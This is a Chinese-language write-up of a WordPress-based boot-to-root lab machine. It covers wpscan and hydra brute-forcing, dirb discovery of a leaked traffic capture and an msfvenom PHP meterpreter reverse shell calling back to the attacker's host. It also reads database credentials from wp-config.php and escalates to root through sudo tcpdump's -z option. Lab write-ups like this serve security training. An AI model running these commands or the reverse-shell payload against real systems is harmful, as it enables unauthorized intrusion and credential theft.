信息收集

扫描端口发现是 80 和 22开放了,其中80运行着wordpress服务

使用 wpscan 扫描用户和插件

1
wpscan --url http://192.168.99.100/ -e u,p

发现了用户 webdeveloper

之后自然是尝试爆破密码了,使用 wpscanhydra 同时爆破

1
2
3
wpscan --url http://192.168.99.100/ -U webdeveloper  -P ./rockyou.txt

hydra -l webdeveloper -P rockyou.txt -t 10 192.168.99.100 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"

但是经过很长时间后并没有爆破出来,神器 xray 扫描也未探测到相关信息

也尝试使用了 dirsearch.py ,但是依旧无果

换用了 dirb

1
2
3
4
5
6
7
8
9
10
GENERATED WORDS: 4613                                                          

---- Scanning URL: http://192.168.99.100/ ----
+ http://192.168.99.100/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.99.100/ipdata/ !!!
+ http://192.168.99.100/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.99.100/wp-admin/
==> DIRECTORY: http://192.168.99.100/wp-content/
==> DIRECTORY: http://192.168.99.100/wp-includes/
+ http://192.168.99.100/xmlrpc.php (CODE:405|SIZE:42)

发现了 ipdata/ 目录,访问之后是一个流量包

打开之后过滤

1
http.request.method == "POST"

原来密码这么复杂。怪不得爆破不出来

getshell

登录后台之后发现安装了两个插件,并且可以修改源代码,这时候就会想到用 msfvenom 生成php木马,然后反弹得到shell

1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.99.1 lport=4444 -f raw -o shell.php

修改一个插件的源码然后启用就能拿到shell了

然后查看 wp-config.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'webdeveloper');

/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

获得了数据库的账号和密码,那就登陆一下数据库

但是在数据库中并没有获得很多信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec

尝试直接ssh登陆,居然可以!

提权

登录之后 , sudo -l

1
2
3
4
5
6
7
webdeveloper@webdeveloper:~$ sudo -l
[sudo] password for webdeveloper:
Matching Defaults entries for webdeveloper on webdeveloper:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webdeveloper may run the following commands on webdeveloper:
(root) /usr/sbin/tcpdump

那就可以用 tcpdump 提权了

1
2
3
4
5
6
7
8
9
10
11
12
13
webdeveloper@webdeveloper:~$ touch /tmp/exploit
webdeveloper@webdeveloper:~$ echo "cat /root/flag.txt" > /tmp/exploit
webdeveloper@webdeveloper:~$ chmod +x /tmp/exploit
webdeveloper@webdeveloper:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
[sudo] password for webdeveloper:
dropped privs to root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
710 packets received by filter
0 packets dropped by kernel
webdeveloper@webdeveloper:~$ Congratulations here is youre flag:
cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290